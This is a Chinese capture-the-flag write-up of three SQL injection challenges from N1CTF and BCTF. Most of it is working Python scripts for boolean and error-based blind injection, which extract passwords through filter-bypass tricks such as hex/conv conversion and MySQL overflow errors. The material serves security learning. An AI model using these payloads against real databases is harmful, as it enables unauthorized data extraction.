N1CTF+BCTF(3道sql注入)

前言

三道sql注入题,涨姿势.

正文

77777

题目及分析

部分代码审计,实际上就是要对hi进行bool盲注,如果分数更新了,就说明注入为真.

解题脚本

#hi = where ord(mid((select group_concat(user())), 1, 1)) > 0 &flag=55553
import requests
url = 'http://47.97.168.223:23333/'
ans = ''
flag = 153333
mid = 0
for pos in range(10,15):
    l = 0
    r = 127
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"}
    mid = 0
    x='1234567890qwertyuiopasdfghjkl;zxcvbnm,._/QWERTYUIOPASDFGHJKLZXCVBNM'
    for j in range(0,len(x)):
        flag = flag + 1
        data = {'hi': ' where mid((select group_concat(password)) ,' +str(pos) +', 1) like '+hex(ord(x[j])), 'flag': flag}
        resp = requests.post(url,data=data).text
        if str(flag) in resp:
            ans = ans + x[j]
            break
        elif str(flag-1) not in resp:
            j = 0
    print pos
    print ans
#venenof7
#he3l3locat233

77777(2)

分析

mid被过滤了,还有几个数字也被过滤了,可以用conv搭配hex将每一位转换成16进制,再*flag,回显即是每一位转成数字后的结果,逆推一下就知道了.

脚本

import re
import requests

_target = 'http://47.52.137.90:20000/'

def extract_points(html):
    return re.search(r'My Points \| ([0-9]+)
', html).group(1).strip()

def get_pw_len():
    d = {'flag': '1', 'hi': '*length( pw )'}
    resp = requests.post(_target, data=d)
    return int(extract_points(resp.text))

flag = ''
for i in range(1,get_pw_len()+1):
    d = {'flag': '1', 'hi': '*convert(hex(substr( pw ,0b{0:b},1)),signed)'.format(i)}
    resp = requests.post(_target, data=d)
    flag += chr(int(extract_points(resp.text), 16))
    print flag

print '[+] flag: N1CTF{{{}}}'.format(flag)

Love Q

fuzz后发现能过滤的都过滤了,数字只剩下2和9,还有select,if可用,更不同的是,这次的分数看不到了,只能根据报错sorry进行盲注.有个坑人的地方在那边的sorry非常小,比赛时根本没看见,还以为报不了错 :P

mysql三种溢出报错姿势

1.整形溢出报错
*

+

2.类型转换导致unsigned出现负号致使报错
^

3.浮点数报错
double的范围:-1.79E+308 ~ +1.79E+308
^(取反)

解题脚本分析

import string
import requests
import sys
flag = 0
url = "http://9ec20782e7c14e2bac67c9bde95b39e39c887ccc4d314867.game.ichunqiu.com/"
data = {'flag': flag}
proxies={
    'http':None,
    'https':None
}
index = 1
ans = ""
while True:
    for i in string.ascii_letters:
        data['hi'] = "|if((select pw)>'%s',2,999999999*9e299)" % (ans + i)
        result = requests.post(url, data=data,proxies=proxies)
        if i=='Z':
            exit()
        if 'sorry' in result.text:
            ans += chr(ord(i)-1)
            print ans
            sys.stdout.flush()
            break

注意最后一位把g还原成h即可

相关链接

http://hackermio.me/2018/04/21/BCTF-Web-Writeup/
http://f1sh.site/2018/04/22/bctf-love-q-writeup/